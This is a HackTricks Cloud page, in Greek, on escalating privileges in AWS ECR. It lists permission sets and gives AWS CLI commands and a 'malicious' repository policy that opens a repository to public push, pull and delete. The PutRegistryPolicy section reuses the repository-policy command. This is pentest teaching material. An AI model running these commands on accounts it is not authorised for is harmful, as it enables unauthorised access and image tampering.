AWS - ECR Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

ECR

`ecr:GetAuthorizationToken`,`ecr:BatchGetImage`

Ένας επιτιθέμενος με το ecr:GetAuthorizationToken και ecr:BatchGetImage μπορεί να συνδεθεί στο ECR και να κατεβάσει εικόνες.

Για περισσότερες πληροφορίες σχετικά με το πώς να κατεβάσετε εικόνες:

AWS - ECR Post Exploitation

Potential Impact: Έμμεση εκμετάλλευση μέσω της παρεμπόδισης ευαίσθητων πληροφοριών στην κίνηση.

`ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart`

Ένας επιτιθέμενος με όλες αυτές τις άδειες μπορεί να συνδεθεί στο ECR και να ανεβάσει εικόνες. Αυτό μπορεί να είναι χρήσιμο για την κλιμάκωση των δικαιωμάτων σε άλλα περιβάλλοντα όπου χρησιμοποιούνται αυτές οι εικόνες.

Για να μάθετε πώς να ανεβάσετε μια νέα εικόνα/να ενημερώσετε μία, ελέγξτε:

AWS - EKS Enum

`ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart`

Όπως η προηγούμενη ενότητα, αλλά για δημόσιες αποθήκες.

`ecr:SetRepositoryPolicy`

Ένας επιτιθέμενος με αυτή την άδεια θα μπορούσε να αλλάξει την πολιτική της αποθήκης για να παραχωρήσει στον εαυτό του (ή ακόμα και σε όλους) πρόσβαση ανάγνωσης/εγγραφής. Για παράδειγμα, σε αυτό το παράδειγμα, η πρόσβαση ανάγνωσης παραχωρείται σε όλους.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

Περιεχόμενα του my-policy.json:

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

`ecr-public:SetRepositoryPolicy`

Όπως η προηγούμενη ενότητα, αλλά για δημόσιες αποθήκες. Ένας επιτιθέμενος μπορεί να τροποποιήσει την πολιτική αποθήκης μιας δημόσιας αποθήκης ECR για να παραχωρήσει μη εξουσιοδοτημένη δημόσια πρόσβαση ή να κλιμακώσει τα δικαιώματά του.

bashCopy code# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

Πιθανές Επιπτώσεις: Μη εξουσιοδοτημένη δημόσια πρόσβαση στο δημόσιο αποθετήριο ECR, επιτρέποντας σε οποιονδήποτε χρήστη να σπρώξει, να τραβήξει ή να διαγράψει εικόνες.

`ecr:PutRegistryPolicy`

Ένας επιτιθέμενος με αυτή την άδεια θα μπορούσε να αλλάξει την πολιτική αποθετηρίου για να παραχωρήσει στον εαυτό του, τον λογαριασμό του (ή ακόμα και σε όλους) πρόσβαση ανάγνωσης/εγγραφής.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

Υποστήριξη HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στο 💬 Discord group ή στο telegram group ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

PreviousAWS - EC2 Privesc NextAWS - ECS Privesc

Last updated 3 days ago